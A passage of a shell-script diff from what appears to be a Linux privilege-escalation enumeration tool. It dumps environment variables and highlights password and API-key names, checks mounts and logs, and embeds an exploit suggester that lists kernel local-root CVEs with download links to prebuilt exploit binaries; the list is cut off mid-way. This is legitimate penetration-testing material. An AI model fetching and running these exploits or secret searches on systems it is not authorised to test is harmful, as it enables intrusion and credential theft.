+print_2title "Date & uptime"
+warn_exec date 2>/dev/null
+warn_exec uptime 2>/dev/null
+echo ""
+
+#-- SY) System stats
+if [ "$EXTRA_CHECKS" ]; then
+ print_2title "System stats"
+ (df -h || lsblk) 2>/dev/null || echo_not_found "df and lsblk"
+ warn_exec free 2>/dev/null
+ echo ""
+fi
+
+#-- SY) CPU info
+if [ "$EXTRA_CHECKS" ]; then
+ print_2title "CPU info"
+ warn_exec lscpu 2>/dev/null
+ echo ""
+fi
+
+if [ -d "/dev" ] || [ "$DEBUG" ] ; then
+ print_2title "Any sd*/disk* disk in /dev? (limit 20)"
+ ls /dev 2>/dev/null | grep -Ei "^sd|^disk" | sed "s,crypt,${SED_RED}," | head -n 20
+ echo ""
+fi
+
+if [ -f "/etc/fstab" ] || [ "$DEBUG" ]; then
+ print_2title "Unmounted file-system?"
+ print_info "Check if you can mount umounted devices"
+ grep -v "^#" /etc/fstab 2>/dev/null | grep -Ev "\W+\#|^#" | sed -${E} "s,$mountG,${SED_GREEN},g" | sed -${E} "s,$notmounted,${SED_RED},g" | sed -${E} "s%$mounted%${SED_BLUE}%g" | sed -${E} "s,$Wfolders,${SED_RED}," | sed -${E} "s,$mountpermsB,${SED_RED},g" | sed -${E} "s,$mountpermsG,${SED_GREEN},g"
+ echo ""
+fi
+
+if ([ "$(command -v diskutil)" ] || [ "$DEBUG" ]) && [ "$EXTRA_CHECKS" ]; then
+ print_2title "Mounted disks information"
+ warn_exec diskutil list
+ echo ""
+fi
+
+if [ "$(command -v smbutil)" ] || [ "$DEBUG" ]; then
+ print_2title "Mounted SMB Shares"
+ warn_exec smbutil statshares -a
+ echo ""
+fi
+
+#-- SY) Environment vars
+print_2title "Environment"
+print_info "Any private information inside environment variables?"
+(env || printenv || set) 2>/dev/null | grep -v "RELEVANT*|FIND*|^VERSION=|dbuslistG|mygroups|ldsoconfdG|pwd_inside_history|kernelDCW_Ubuntu_Precise|kernelDCW_Ubuntu_Trusty|kernelDCW_Ubuntu_Xenial|kernelDCW_Rhel|^sudovB=|^rootcommon=|^mounted=|^mountG=|^notmounted=|^mountpermsB=|^mountpermsG=|^kernelB=|^C=|^RED=|^GREEN=|^Y=|^B=|^NC=|TIMEOUT=|groupsB=|groupsVB=|knw_grps=|sidG|sidB=|sidVB=|sidVB2=|sudoB=|sudoG=|sudoVB=|timersG=|capsB=|notExtensions=|Wfolders=|writeB=|writeVB=|_usrs=|compiler=|PWD=|LS_COLORS=|pathshG=|notBackup=|processesDump|processesB|commonrootdirs|USEFUL_SOFTWARE|PSTORAGE_KUBERNETES" | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[aA][pP][iI][kK][eE][yY]|[aA][pP][iI][_][kK][eE][yY]|KRB5CCNAME,${SED_RED},g" || echo_not_found "env || set"
+echo ""
+
+#-- SY) Dmesg
+if [ "$(command -v dmesg 2>/dev/null)" ] || [ "$DEBUG" ]; then
+ print_2title "Searching Signature verification failed in dmesg"
+ print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed"
+ (dmesg 2>/dev/null | grep "signature") || echo_not_found "dmesg"
+ echo ""
+fi
+
+#-- SY) Kernel extensions
+if [ "$MACPEAS" ]; then
+ print_2title "Kernel Extensions not belonging to apple"
+ kextstat 2>/dev/null | grep -Ev " com.apple."
+
+ print_2title "Unsigned Kernel Extensions"
+ macosNotSigned /Library/Extensions
+ macosNotSigned /System/Library/Extensions
+fi
+
+if [ "$(command -v bash 2>/dev/null)" ]; then
+ print_2title "Executing Linux Exploit Suggester"
+ print_info "https://github.com/mzet-/linux-exploit-suggester"
+ les_b64="#!/bin/bash

#
# Copyright (c) 2016-2020, @_mzet_
#
# linux-exploit-suggester.sh comes with ABSOLUTELY NO WARRANTY.
# This is free software, and you are welcome to redistribute it
# under the terms of the GNU General Public License. See LICENSE
# file for usage of this software.
#

VERSION=v1.1

# bash colors
#txtred="\e[0;31m"
txtred="\e[91;1m"
txtgrn="\e[1;32m"
txtgray="\e[0;37m"
txtblu="\e[0;36m"
txtrst="\e[0m"
bldwht='\e[1;37m'
wht='\e[0;36m'
bldblu='\e[1;34m'
yellow='\e[1;93m'
lightyellow='\e[0;93m'

# input data
UNAME_A=""

# parsed data for current OS
KERNEL=""
OS=""
DISTRO=""
ARCH=""
PKG_LIST=""

# kernel config
KCONFIG=""

CVELIST_FILE=""

opt_fetch_bins=false
opt_fetch_srcs=false
opt_kernel_version=false
opt_uname_string=false
opt_pkglist_file=false
opt_cvelist_file=false
opt_checksec_mode=false
opt_full=false
opt_summary=false
opt_kernel_only=false
opt_userspace_only=false
opt_show_dos=false
opt_skip_more_checks=false
opt_skip_pkg_versions=false

ARGS=
SHORTOPTS="hVfbsu:k:dp:g"
LONGOPTS="help,version,full,fetch-binaries,fetch-sources,uname:,kernel:,show-dos,pkglist-file:,short,kernelspace-only,userspace-only,skip-more-checks,skip-pkg-versions,cvelist-file:,checksec"

## exploits database
declare -a EXPLOITS
declare -a EXPLOITS_USERSPACE

## temporary array for purpose of sorting exploits (based on exploits' rank)
declare -a exploits_to_sort
declare -a SORTED_EXPLOITS

############ LINUX KERNELSPACE EXPLOITS ####################
n=0

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2004-1235]${txtrst} elflbl
Reqs: pkg=linux-kernel,ver=2.4.29
Tags:
Rank: 1
analysis-url: http://isec.pl/vulnerabilities/isec-0021-uselib.txt
bin-url: https://web.archive.org/web/20111103042904/http://tarantula.by.ru/localroot/2.6.x/elflbl
exploit-db: 744
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2004-1235]${txtrst} uselib()
Reqs: pkg=linux-kernel,ver=2.4.29
Tags:
Rank: 1
analysis-url: http://isec.pl/vulnerabilities/isec-0021-uselib.txt
exploit-db: 778
Comments: Known to work only for 2.4 series (even though 2.6 is also vulnerable)
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2004-1235]${txtrst} krad3
Reqs: pkg=linux-kernel,ver>=2.6.5,ver<=2.6.11
Tags:
Rank: 1
exploit-db: 1397
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2004-0077]${txtrst} mremap_pte
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.2
Tags:
Rank: 1
exploit-db: 160
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2006-2451]${txtrst} raptor_prctl
Reqs: pkg=linux-kernel,ver>=2.6.13,ver<=2.6.17
Tags:
Rank: 1
exploit-db: 2031
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2006-2451]${txtrst} prctl
Reqs: pkg=linux-kernel,ver>=2.6.13,ver<=2.6.17
Tags:
Rank: 1
exploit-db: 2004
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2006-2451]${txtrst} prctl2
Reqs: pkg=linux-kernel,ver>=2.6.13,ver<=2.6.17
Tags:
Rank: 1
exploit-db: 2005
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2006-2451]${txtrst} prctl3
Reqs: pkg=linux-kernel,ver>=2.6.13,ver<=2.6.17
Tags:
Rank: 1
exploit-db: 2006
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2006-2451]${txtrst} prctl4
Reqs: pkg=linux-kernel,ver>=2.6.13,ver<=2.6.17
Tags:
Rank: 1
exploit-db: 2011
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2006-3626]${txtrst} h00lyshit
Reqs: pkg=linux-kernel,ver>=2.6.8,ver<=2.6.16
Tags:
Rank: 1
bin-url: https://web.archive.org/web/20111103042904/http://tarantula.by.ru/localroot/2.6.x/h00lyshit
exploit-db: 2013
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2008-0600]${txtrst} vmsplice1
Reqs: pkg=linux-kernel,ver>=2.6.17,ver<=2.6.24
Tags:
Rank: 1
exploit-db: 5092
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2008-0600]${txtrst} vmsplice2
Reqs: pkg=linux-kernel,ver>=2.6.23,ver<=2.6.24
Tags:
Rank: 1
exploit-db: 5093
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2008-4210]${txtrst} ftrex
Reqs: pkg=linux-kernel,ver>=2.6.11,ver<=2.6.22
Tags:
Rank: 1
exploit-db: 6851
Comments: world-writable sgid directory and shell that does not drop sgid privs upon exec (ash/sash) are required
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2008-4210]${txtrst} exit_notify
Reqs: pkg=linux-kernel,ver>=2.6.25,ver<=2.6.29
Tags:
Rank: 1
exploit-db: 8369
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-2692]${txtrst} sock_sendpage (simple version)
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.30
Tags: ubuntu=7.10,RHEL=4,fedora=4|5|6|7|8|9|10|11
Rank: 1
exploit-db: 9479
Comments: Works for systems with /proc/sys/vm/mmap_min_addr equal to 0
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-2692,CVE-2009-1895]${txtrst} sock_sendpage
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.30
Tags: ubuntu=9.04
Rank: 1
analysis-url: https://xorl.wordpress.com/2009/07/16/cve-2009-1895-linux-kernel-per_clear_on_setid-personality-bypass/
src-url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9435.tgz
exploit-db: 9435
Comments: /proc/sys/vm/mmap_min_addr needs to equal 0 OR pulseaudio needs to be installed
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-2692,CVE-2009-1895]${txtrst} sock_sendpage2
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.30
Tags: 
Rank: 1
src-url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9436.tgz
exploit-db: 9436
Comments: Works for systems with /proc/sys/vm/mmap_min_addr equal to 0
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-2692,CVE-2009-1895]${txtrst} sock_sendpage3
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.30
Tags: 
Rank: 1
src-url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9641.tar.gz
exploit-db: 9641
Comments: /proc/sys/vm/mmap_min_addr needs to equal 0 OR pulseaudio needs to be installed
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-2692,CVE-2009-1895]${txtrst} sock_sendpage (ppc)
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.30
Tags: ubuntu=8.10,RHEL=4|5
Rank: 1
exploit-db: 9545
Comments: /proc/sys/vm/mmap_min_addr needs to equal 0
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-2698]${txtrst} the rebel (udp_sendmsg)
Reqs: pkg=linux-kernel,ver>=2.6.1,ver<=2.6.19
Tags: debian=4
Rank: 1
src-url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9574.tgz
exploit-db: 9574
analysis-url: https://blog.cr0.org/2009/08/cve-2009-2698-udpsendmsg-vulnerability.html
author: spender
Comments: /proc/sys/vm/mmap_min_addr needs to equal 0 OR pulseaudio needs to be installed
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-2698]${txtrst} hoagie_udp_sendmsg
Reqs: pkg=linux-kernel,ver>=2.6.1,ver<=2.6.19,x86
Tags: debian=4
Rank: 1
exploit-db: 9575
analysis-url: https://blog.cr0.org/2009/08/cve-2009-2698-udpsendmsg-vulnerability.html
author: andi
Comments: Works for systems with /proc/sys/vm/mmap_min_addr equal to 0
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-2698]${txtrst} katon (udp_sendmsg)
Reqs: pkg=linux-kernel,ver>=2.6.1,ver<=2.6.19,x86
Tags: debian=4
Rank: 1
src-url: https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack/raw/master/2009/CVE-2009-2698/katon.c
analysis-url: https://blog.cr0.org/2009/08/cve-2009-2698-udpsendmsg-vulnerability.html
author: VxHell Labs
Comments: Works for systems with /proc/sys/vm/mmap_min_addr equal to 0
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-2698]${txtrst} ip_append_data
Reqs: pkg=linux-kernel,ver>=2.6.1,ver<=2.6.19,x86
Tags: fedora=4|5|6,RHEL=4
Rank: 1
analysis-url: https://blog.cr0.org/2009/08/cve-2009-2698-udpsendmsg-vulnerability.html
exploit-db: 9542
author: p0c73n1
Comments: Works for systems with /proc/sys/vm/mmap_min_addr equal to 0
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-3547]${txtrst} pipe.c 1
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.31
Tags:
Rank: 1
exploit-db: 33321
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-3547]${txtrst} pipe.c 2
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.31
Tags:
Rank: 1
exploit-db: 33322
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-3547]${txtrst} pipe.c 3
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.31
Tags:
Rank: 1
exploit-db: 10018
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2010-3301]${txtrst} ptrace_kmod2
Reqs: pkg=linux-kernel,ver>=2.6.26,ver<=2.6.34
Tags: debian=6.0{kernel:2.6.(32|33|34|35)-(1|2|trunk)-amd64},ubuntu=(10.04|10.10){kernel:2.6.(32|35)-(19|21|24)-server}
Rank: 1
bin-url: https://web.archive.org/web/20111103042904/http://tarantula.by.ru/localroot/2.6.x/kmod2
bin-url: https://web.archive.org/web/20111103042904/http://tarantula.by.ru/localroot/2.6.x/ptrace-kmod
bin-url: https://web.archive.org/web/20160602192641/https://www.kernel-exploits.com/media/ptrace_kmod2-64
exploit-db: 15023
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2010-1146]${txtrst} reiserfs
Reqs: pkg=linux-kernel,ver>=2.6.18,ver<=2.6.34
Tags: ubuntu=9.10
Rank: 1
analysis-url: https://jon.oberheide.org/blog/2010/04/10/reiserfs-reiserfs_priv-vulnerability/
src-url: https://jon.oberheide.org/files/team-edward.py
exploit-db: 12130
comments: Requires a ReiserFS filesystem mounted with extended attributes
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2010-2959]${txtrst} can_bcm
Reqs: pkg=linux-kernel,ver>=2.6.18,ver<=2.6.36
Tags: ubuntu=10.04{kernel:2.6.32-24-generic}
Rank: 1
bin-url: https://web.archive.org/web/20160602192641/https://www.kernel-exploits.com/media/can_bcm
exploit-db: 14814
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2010-3904]${txtrst} rds
Reqs: pkg=linux-kernel,ver>=2.6.30,ver<2.6.37
Tags: debian=6.0{kernel:2.6.(31|32|34|35)-(1|trunk)-amd64},ubuntu=10.10|9.10,fedora=13{kernel:2.6.33.3-85.fc13.i686.PAE},ubuntu=10.04{kernel:2.6.32-(21|24)-generic}
Rank: 1
analysis-url: http://www.securityfocus.com/archive/1/514379
src-url: http://web.archive.org/web/20101020044048/http://www.vsecurity.com/download/tools/linux-rds-exploit.c
bin-url: https://web.archive.org/web/20160602192641/https://www.kernel-exploits.com/media/rds
bin-url: https://web.archive.org/web/20160602192641/https://www.kernel-exploits.com/media/rds64
exploit-db: 15285
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2010-3848,CVE-2010-3850,CVE-2010-4073]${txtrst} half_nelson
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.36
Tags: ubuntu=(10.04|9.10){kernel:2.6.(31|32)-(14|21)-server}
Rank: 1
bin-url: http://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/half-nelson3
exploit-db: 17787
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[N/A]${txtrst} caps_to_root
Reqs: pkg=linux-kernel,ver>=2.6.34,ver<=2.6.36,x86
Tags: ubuntu=10.10
Rank: 1
exploit-db: 15916
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[N/A]${txtrst} caps_to_root 2
Reqs: pkg=linux-kernel,ver>=2.6.34,ver<=2.6.36
Tags: ubuntu=10.10
Rank: 1
exploit-db: 15944
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2010-4347]${txtrst} american-sign-language
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.36
Tags:
Rank: 1
exploit-db: 15774
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2010-3437]${txtrst} pktcdvd
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.36
Tags: ubuntu=10.04
Rank: 1
exploit-db: 15150
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2010-3081]${txtrst} video4linux
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.33
Tags: RHEL=5
Rank: 1
exploit-db: 15024
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2012-0056]${txtrst} memodipper
Reqs: pkg=linux-kernel,ver>=3.0.0,ver<=3.1.0
Tags: ubuntu=(10.04|11.10){kernel:3.0.0-12-(generic|server)}
Rank: 1
analysis-url: https://git.zx2c4.com/CVE-2012-0056/about/
src-url: https://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c
bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/memodipper
bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/memodipper64
exploit-db: 18411
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2012-0056,CVE-2010-3849,CVE-2010-3850]${txtrst} full-nelson
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.36
Tags: ubuntu=(9.10|10.10){kernel:2.6.(31|35)-(14|19)-(server|generic)},ubuntu=10.04{kernel:2.6.32-(21|24)-server}
Rank: 1
src-url: http://vulnfactory.org/exploits/full-nelson.c
bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/full-nelson
bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/full-nelson64
exploit-db: 15704
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2013-1858]${txtrst} CLONE_NEWUSER|CLONE_FS
Reqs: pkg=linux-kernel,ver=3.8,CONFIG_USER_NS=y
Tags: 
Rank: 1
src-url: http://stealth.openwall.net/xSports/clown-newuser.c
analysis-url: https://lwn.net/Articles/543273/
exploit-db: 38390
author: Sebastian Krahmer
Comments: CONFIG_USER_NS needs to be enabled 
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2013-2094]${txtrst} perf_swevent
Reqs: pkg=linux-kernel,ver>=2.6.32,ver<3.8.9,x86_64
Tags: RHEL=6,ubuntu=12.04{kernel:3.2.0-(23|29)-generic},fedora=16{kernel:3.1.0-7.fc16.x86_64},fedora=17{kernel:3.3.4-5.fc17.x86_64},debian=7{kernel:3.2.0-4-amd64}
Rank: 1
analysis-url: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/
bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/perf_swevent
bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/perf_swevent64
exploit-db: 26131
author: Andrea 'sorbo' Bittau
Comments: No SMEP/SMAP bypass
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2013-2094]${txtrst} perf_swevent 2
Reqs: pkg=linux-kernel,ver>=2.6.32,ver<3.8.9,x86_64
Tags: ubuntu=12.04{kernel:3.(2|5).0-(23|29)-generic}
Rank: 1
analysis-url: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/
src-url: https://cyseclabs.com/exploits/vnik_v1.c
exploit-db: 33589
author: Vitaly 'vnik' Nikolenko
Comments: No SMEP/SMAP bypass
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2013-0268]${txtrst} msr
Reqs: pkg=linux-kernel,ver>=2.6.18,ver<3.7.6
Tags: 
Rank: 1
exploit-db: 27297
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2013-1959]${txtrst} userns_root_sploit
Reqs: pkg=linux-kernel,ver>=3.0.1,ver<3.8.9
Tags: 
Rank: 1
analysis-url: http://www.openwall.com/lists/oss-security/2013/04/29/1
exploit-db: 25450
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2013-2094]${txtrst} semtex
Reqs: pkg=linux-kernel,ver>=2.6.32,ver<3.8.9
Tags: RHEL=6
Rank: 1
analysis-url: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/
exploit-db: 25444
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2014-0038]${txtrst} timeoutpwn
Reqs: pkg=linux-kernel,ver>=3.4.0,ver<=3.13.1,CONFIG_X86_X32=y
Tags: ubuntu=13.10
Rank: 1
analysis-url: http://blog.includesecurity.com/2014/03/exploit-CVE-2014-0038-x32-recvmmsg-kernel-vulnerablity.html
bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/timeoutpwn64
exploit-db: 31346
Comments: CONFIG_X86_X32 needs to be enabled
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2014-0038]${txtrst} timeoutpwn 2
Reqs: pkg=linux-kernel,ver>=3.4.0,ver<=3.13.1,CONFIG_X86_X32=y
Tags: ubuntu=(13.04|13.10){kernel:3.(8|11).0-(12|15|19)-generic}
Rank: 1
analysis-url: http://blog.includesecurity.com/2014/03/exploit-CVE-2014-0038-x32-recvmmsg-kernel-vulnerablity.html
exploit-db: 31347
Comments: CONFIG_X86_X32 needs to be enabled
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2014-0196]${txtrst} rawmodePTY
Reqs: pkg=linux-kernel,ver>=2.6.31,ver<=3.14.3
Tags:
Rank: 1
analysis-url: http://blog.includesecurity.com/2014/06/exploit-walkthrough-cve-2014-0196-pty-kernel-race-condition.html
exploit-db: 33516
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2014-2851]${txtrst} use-after-free in ping_init_sock() ${bldblu}(DoS)${txtrst}
Reqs: pkg=linux-kernel,ver>=3.0.1,ver<=3.14
Tags: 
Rank: 0
analysis-url: https://cyseclabs.com/page?n=02012016
exploit-db: 32926
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2014-4014]${txtrst} inode_capable
Reqs: pkg=linux-kernel,ver>=3.0.1,ver<=3.13
Tags: ubuntu=12.04
Rank: 1
analysis-url: http://www.openwall.com/lists/oss-security/2014/06/10/4
exploit-db: 33824
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2014-4699]${txtrst} ptrace/sysret
Reqs: pkg=linux-kernel,ver>=3.0.1,ver<=3.8
Tags: ubuntu=12.04
Rank: 1
analysis-url: http://www.openwall.com/lists/oss-security/2014/07/08/16
exploit-db: 34134
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2014-4943]${txtrst} PPPoL2TP ${bldblu}(DoS)${txtrst}
Reqs: pkg=linux-kernel,ver>=3.2,ver<=3.15.6
Tags: 
Rank: 1
analysis-url: https://cyseclabs.com/page?n=01102015
exploit-db: 36267
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2014-5207]${txtrst} fuse_suid
Reqs: pkg=linux-kernel,ver>=3.0.1,ver<=3.16.1
Tags: 
Rank: 1
exploit-db: 34923
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-9322]${txtrst} BadIRET
Reqs: pkg=linux-kernel,ver>=3.0.1,ver<3.17.5,x86_64
Tags: RHEL<=7,fedora=20
Rank: 1
analysis-url: http://labs.bromium.com/2015/02/02/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/
src-url: http://site.pi3.com.pl/exp/p_cve-2014-9322.tar.gz
exploit-db:
author: Rafal 'n3rgal' Wojtczuk & Adam 'pi3' Zabrocki
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-3290]${txtrst} espfix64_NMI
Reqs: pkg=linux-kernel,ver>=3.13,ver<4.1.6,x86_64
Tags: 
Rank: 1
analysis-url: http://www.openwall.com/lists/oss-security/2015/08/04/8
exploit-db: 37722
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[N/A]${txtrst} bluetooth
Reqs: pkg=linux-kernel,ver<=2.6.11
Tags:
Rank: 1
exploit-db: 4756
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-1328]${txtrst} overlayfs
Reqs: pkg=linux-kernel,ver>=3.13.0,ver<=3.19.0
Tags: ubuntu=(12.04|14.04){kernel:3.13.0-(2|3|4|5)*-generic},ubuntu=(14.10|15.04){kernel:3.(13|16).0-*-generic}
Rank: 1
analysis-url: http://seclists.org/oss-sec/2015/q2/717
bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/ofs_32
bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/ofs_64
exploit-db: 37292
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-8660]${txtrst} overlayfs (ovl_setattr)
Reqs: pkg=linux-kernel,ver>=3.0.0,ver<=4.3.3
Tags:
Rank: 1
analysis-url: http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/
exploit-db: 39230
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-8660]${txtrst} overlayfs (ovl_setattr)
Reqs: pkg=linux-kernel,ver>=3.0.0,ver<=4.3.3
Tags: ubuntu=(14.04|15.10){kernel:4.2.0-(18|19|20|21|22)-generic}
Rank: 1
analysis-url: http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/
exploit-db: 39166
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-0728]${txtrst} keyring
Reqs: pkg=linux-kernel,ver>=3.10,ver<4.4.1
Tags:
Rank: 0
analysis-url: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/
exploit-db: 40003
Comments: Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-2384]${txtrst} usb-midi
Reqs: pkg=linux-kernel,ver>=3.0.0,ver<=4.4.8
Tags: ubuntu=14.04,fedora=22
Rank: 1
analysis-url: https://xairy.github.io/blog/2016/cve-2016-2384
src-url: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c
exploit-db: 41999
Comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user
author: Andrey 'xairy' Konovalov
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-4997]${txtrst} target_offset
Reqs: pkg=linux-kernel,ver>=4.4.0,ver<=4.4.0,cmd:grep -qi ip_tables /proc/modules
Tags: ubuntu=16.04{kernel:4.4.0-21-generic}
Rank: 1
src-url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40053.zip
Comments: ip_tables.ko needs to be loaded
exploit-db: 40049
author: Vitaly 'vnik' Nikolenko
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-4557]${txtrst} double-fdput()
Reqs: pkg=linux-kernel,ver>=4.4,ver<4.5.5,CONFIG_BPF_SYSCALL=y,sysctl:kernel.unprivileged_bpf_disabled!=1
Tags: ubuntu=16.04{kernel:4.4.0-21-generic}
Rank: 1
analysis-url: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
src-url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
exploit-db: 40759
author: Jann Horn
EOF
)

